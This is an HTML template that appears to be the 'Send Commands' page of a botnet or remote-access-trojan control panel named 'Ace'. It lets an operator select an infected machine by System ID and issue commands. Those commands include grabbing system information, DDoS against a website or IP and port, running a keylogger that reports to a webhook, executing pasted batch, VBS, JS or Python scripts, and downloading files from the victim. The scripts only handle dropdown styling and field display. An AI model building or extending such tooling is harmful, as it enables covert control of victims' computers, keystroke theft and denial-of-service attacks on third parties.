﻿<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="utf-8">
    
    <title>Ace Send Commands</title>
    <link rel="stylesheet" href="../static/css/site.css"/>
    <link rel="stylesheet" href="../static/css/rgb_border.css"/>
    <link rel="stylesheet" href="https://unicons.iconscout.com/release/v4.0.0/css/line.css">
</head>
<body>
    <script src="../static/js/site.js"></script>

<!-- Top Nav bar -->
<div class="topnav">
    <a href="dashboard.html">Dashboard</a>
    <a class=active href="#sendcommands">Send Commands</a>
    <a href="shell.html">Shell</a>
    <a href="map.html">Map</a>
    <a href="login.html">Logout</a>
</div>


<form id="stuff" method="post" name="stuff">
    <br>
    <br>
    <br>

    <!-- Enter Commands Input -->
    <div class="sizer">
        <div class="containerr">
            <form>
                <!-- System ID Input -->
                <div class="centerrr">
                    <div class="select-commands-group"> 
                        <input type="text" name="idNumber" id="idNumber" required>
                        <span class="highlight"></span>
                        <span class="bar"></span>
                        <label>System ID</label>
                    </div> 
                </div>

                <br>
                <!-- Command Selection Box -->
                <div class="centerrr-box">
                    <div class="select_mate" data-mate-select="active" >
                        <select name="command-selection" id="command-selection" onchange="commandCheck(this);" onclick="return false;">
                            <option value="" >Select Command </option>
                            
                            <!-- Options -->
                            <option value="admincheck">Admin check</option>
                            <option value="clear">Clear output</option>
                            <option value="jigglecursor">Jiggle Cursor</option>
                            <option value="jigglecursorstop">Stop Jiggle Cursor</option>
                            <option value="systeminfo">Grab system information</option>
                            <option value="stress">Stress bot</option>
                            <option value="ddos">DDos website</option>
                            <option value="attack">DDos IP</option>
                            <option value="keylogger">Keylogger</option>
                            <option value="runscript">Run Script</option>
                            <option value="download">Download File</option>
                        </select>

                        <p class="selecionado_opcion"  onclick="open_select(this)" ></p>

                        <span onclick="open_select(this)" class="icon_select_mate" >
                                <svg fill="#000000" height="24" viewBox="0 0 24 24" width="24" xmlns="http://www.w3.org/2000/svg">
                                <path d="M7.41 7.84L12 12.42l4.59-4.58L18 9.25l-6 6-6-6z"/>
                                <path d="M0-.75h24v24H0z" fill="none"/>
                            </svg>
                        </span>
                        <div class="cont_list_select_mate">
                            <ul class="cont_select_int">  </ul> 
                        </div>
                    </div>
                </div>

                <!-- Command Inputs -->
                <div class="centerrr-spec">
                    <!-- Stress -->
                    <div id="input-needed-stress" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="stress-time" id="stress-time" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Stress Time</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="stress-tasks" id="stress-tasks" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Tasks</label>
                        </div> 
                    </div>

                    <!-- DDos Website -->
                    <div id="input-needed-ddos" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-website-method" id="ddos-website-method" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Method</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-website-target" id="ddos-website-target" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Website</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-website-time" id="ddos-website-time" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Attack Time</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-website-thread" id="ddos-website-thread" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Threads</label>
                        </div> 
                    </div>

                    <!-- DDos IP:PORT -->
                    <div id="input-needed-ddos-ip" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-ip-method" id="ddos-ip-method" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Method</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-ip-target" id="ddos-ip-target" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>IP</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-ip-port" id="ddos-ip-port" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Port</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-ip-time" id="ddos-ip-time" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Attack Time</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="ddos-ip-thread" id="ddos-ip-thread" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Threads</label>
                        </div> 
                    </div>

                    <!-- Keylogger -->
                    <div id="input-needed-keylogger" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="keylogger-intervals" id="keylogger-intervals" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Intervals</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="keylogger-reciever-email" id="keylogger-reciever-email" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Webhook</label>
                        </div> 
                    </div>

                    <!-- Run Script -->
                    <div id="input-needed-runscript" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="runscript-name" id="runscript-name" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Script Name</label>
                        </div> 

                        <div class="commands-input-group"> 
                            <input type="text" name="runscript-code" id="runscript-code" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Paste Source Here</label>
                        </div> 

                        <!-- Script Type Selection Box -->
                        <div class="centerrr-box">
                            <div class="select_mate" data-mate-select="active" >
                                <select name="script-type-selection" id="script-type-selection" onchange="" onclick="return false;">
                                    <option value="" >Select Script Type </option>
                                    
                                    <!-- Options -->
                                    <option value="bat">Batch</option>
                                    <option value="js">JavaScript</option>
                                    <option value="vbs">VBS</option>
                                    <option value="py">Python</option>
                                </select>

                                <p class="selecionado_opcion"  onclick="open_select(this)" ></p>

                                <span onclick="open_select(this)" class="icon_select_mate" >
                                        <svg fill="#000000" height="24" viewBox="0 0 24 24" width="24" xmlns="http://www.w3.org/2000/svg">
                                        <path d="M7.41 7.84L12 12.42l4.59-4.58L18 9.25l-6 6-6-6z"/>
                                        <path d="M0-.75h24v24H0z" fill="none"/>
                                    </svg>
                                </span>
                                <div class="cont_list_select_mate">
                                    <ul class="cont_select_int">  </ul> 
                                </div>
                            </div>
                        </div>
                    </div>

                    <!-- Download File -->
                    <div id="input-needed-download" style="display: none;">
                        <div class="commands-input-group"> 
                            <input type="text" name="download-path" id="download-path" novalidate>
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label>Path To File</label>
                        </div> 
                    </div>
                </div>

            </form>
            <br>
            <div class="centerrr"><button type="submit" id="submit" onclick="check(this.form)" class="custom-btn btn-3"><span>Execute</span></button></div>
        </div>
    </div>
    
    <br><br><br><br><br>
    <!-- Command Status -->
    <div class="center-shit">{{ commandStatus }}</div><br><br>
    
    <!-- Command Output Box -->
    <div id="parent">
        <div class="center-output" class="child">
            <div class="gradient-border"> <textarea class='scroll' id="output" name="output" rows="30" cols="185" style="background-color:rgb(27, 27, 27);" readonly>{{ commandOutput }} </textarea> </div>
        </div>
    </div>
<br>
</form>

<!-- Footer -->
<div class="footer"> <p>&copy; Copyright 2022, CookiesKush420</p>

<!-- Command Selection Script -->
<script>
window.onload = function(){
  crear_select();
}

function isMobileDevice() {
    return (typeof window.orientation !== "undefined") || (navigator.userAgent.indexOf('IEMobile') !== -1);
};

 
var li = new Array();
function crear_select(){
var div_cont_select = document.querySelectorAll("[data-mate-select='active']");
var select_ = '';
for (var e = 0; e < div_cont_select.length; e++) {
div_cont_select[e].setAttribute('data-indx-select',e);
div_cont_select[e].setAttribute('data-selec-open','false');
var ul_cont = document.querySelectorAll("[data-indx-select='"+e+"'] > .cont_list_select_mate > ul");
 select_ = document.querySelectorAll("[data-indx-select='"+e+"'] >select")[0];
 if (isMobileDevice()) { 
select_.addEventListener('change', function () {
 _select_option(select_.selectedIndex,e);
});
 }
var select_optiones = select_.options;
document.querySelectorAll("[data-indx-select='"+e+"']  > .selecionado_opcion ")[0].setAttribute('data-n-select',e);
document.querySelectorAll("[data-indx-select='"+e+"']  > .icon_select_mate ")[0].setAttribute('data-n-select',e);
for (var i = 0; i < select_optiones.length; i++) {
li[i] = document.createElement('li');
if (select_optiones[i].selected == true || select_.value == select_optiones[i].innerHTML ) {
li[i].className = 'active';
document.querySelector("[data-indx-select='"+e+"']  > .selecionado_opcion ").innerHTML = select_optiones[i].innerHTML;
};
li[i].setAttribute('data-index',i);
li[i].setAttribute('data-selec-index',e);
// funcion click al selecionar 
li[i].addEventListener( 'click', function(){  _select_option(this.getAttribute('data-index'),this.getAttribute('data-selec-index')); });

li[i].innerHTML = select_optiones[i].innerHTML;
ul_cont[0].appendChild(li[i]);

    }; // Fin For select_optiones
  }; // fin for divs_cont_select
} // Fin Function 



var cont_slc = 0;
function open_select(idx){
var idx1 =  idx.getAttribute('data-n-select');
  var ul_cont_li = document.querySelectorAll("[data-indx-select='"+idx1+"'] .cont_select_int > li");
var hg = 0;
var slect_open = document.querySelectorAll("[data-indx-select='"+idx1+"']")[0].getAttribute('data-selec-open');
var slect_element_open = document.querySelectorAll("[data-indx-select='"+idx1+"'] select")[0];
 if (isMobileDevice()) { 
  if (window.document.createEvent) { // All
  var evt = window.document.createEvent("MouseEvents");
  evt.initMouseEvent("mousedown", false, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
	slect_element_open.dispatchEvent(evt);
} else if (slect_element_open.fireEvent) { // IE
  slect_element_open.fireEvent("onmousedown");
}else {
  slect_element_open.click();
}
}else {

  
  for (var i = 0; i < ul_cont_li.length; i++) {
hg += ul_cont_li[i].offsetHeight;
}; 
 if (slect_open == 'false') {  
 document.querySelectorAll("[data-indx-select='"+idx1+"']")[0].setAttribute('data-selec-open','true');
 document.querySelectorAll("[data-indx-select='"+idx1+"'] > .cont_list_select_mate > ul")[0].style.height = hg+"px";
 document.querySelectorAll("[data-indx-select='"+idx1+"'] > .icon_select_mate")[0].style.transform = 'rotate(180deg)';
}else{
 document.querySelectorAll("[data-indx-select='"+idx1+"']")[0].setAttribute('data-selec-open','false');
 document.querySelectorAll("[data-indx-select='"+idx1+"'] > .icon_select_mate")[0].style.transform = 'rotate(0deg)';
 document.querySelectorAll("[data-indx-select='"+idx1+"'] > .cont_list_select_mate > ul")[0].style.height = "0px";
 }
}

} // fin function open_select

function salir_select(indx){
var select_ = document.querySelectorAll("[data-indx-select='"+indx+"'] > select")[0];
 document.querySelectorAll("[data-indx-select='"+indx+"'] > .cont_list_select_mate > ul")[0].style.height = "0px";
document.querySelector("[data-indx-select='"+indx+"'] > .icon_select_mate").style.transform = 'rotate(0deg)';
 document.querySelectorAll("[data-indx-select='"+indx+"']")[0].setAttribute('data-selec-open','false');
}


function _select_option(indx,selc){
 if (isMobileDevice()) { 
selc = selc -1;
}
    var select_ = document.querySelectorAll("[data-indx-select='"+selc+"'] > select")[0];

  var li_s = document.querySelectorAll("[data-indx-select='"+selc+"'] .cont_select_int > li");
  var p_act = document.querySelectorAll("[data-indx-select='"+selc+"'] > .selecionado_opcion")[0].innerHTML = li_s[indx].innerHTML;
var select_optiones = document.querySelectorAll("[data-indx-select='"+selc+"'] > select > option");
for (var i = 0; i < li_s.length; i++) {
if (li_s[i].className == 'active') {
li_s[i].className = '';
};
li_s[indx].className = 'active';

};
select_optiones[indx].selected = true;
  select_.selectedIndex = indx;
  select_.onchange();
  salir_select(selc); 
}


</script>

<!-- Command Input Script -->
<script>
function commandCheck(command) {
    /* Stress */
    if (command.value == "stress") {
        document.getElementById("input-needed-stress").style.display = "block";
    } else {
        document.getElementById("input-needed-stress").style.display = "none";
    }

    /* DDos Website */
    if (command.value == "ddos") {
        document.getElementById("input-needed-ddos").style.display = "block";
    } else {
        document.getElementById("input-needed-ddos").style.display = "none";
    }

    /* DDos IP:PORT */
    if (command.value == "attack") {
        document.getElementById("input-needed-ddos-ip").style.display = "block";
    } else {
        document.getElementById("input-needed-ddos-ip").style.display = "none";
    }

    /* Keylogger */
    if (command.value == "keylogger") {
        document.getElementById("input-needed-keylogger").style.display = "block";
    } else {
        document.getElementById("input-needed-keylogger").style.display = "none";
    }

    /* Run Script */
    if (command.value == "runscript") {
        document.getElementById("input-needed-runscript").style.display = "block";
    } else {
        document.getElementById("input-needed-runscript").style.display = "none";
    }

    /* Download File */
    if (command.value == "download") {
        document.getElementById("input-needed-download").style.display = "block";
    } else {
        document.getElementById("input-needed-download").style.display = "none";
    }
}
</script>



</body>
</html>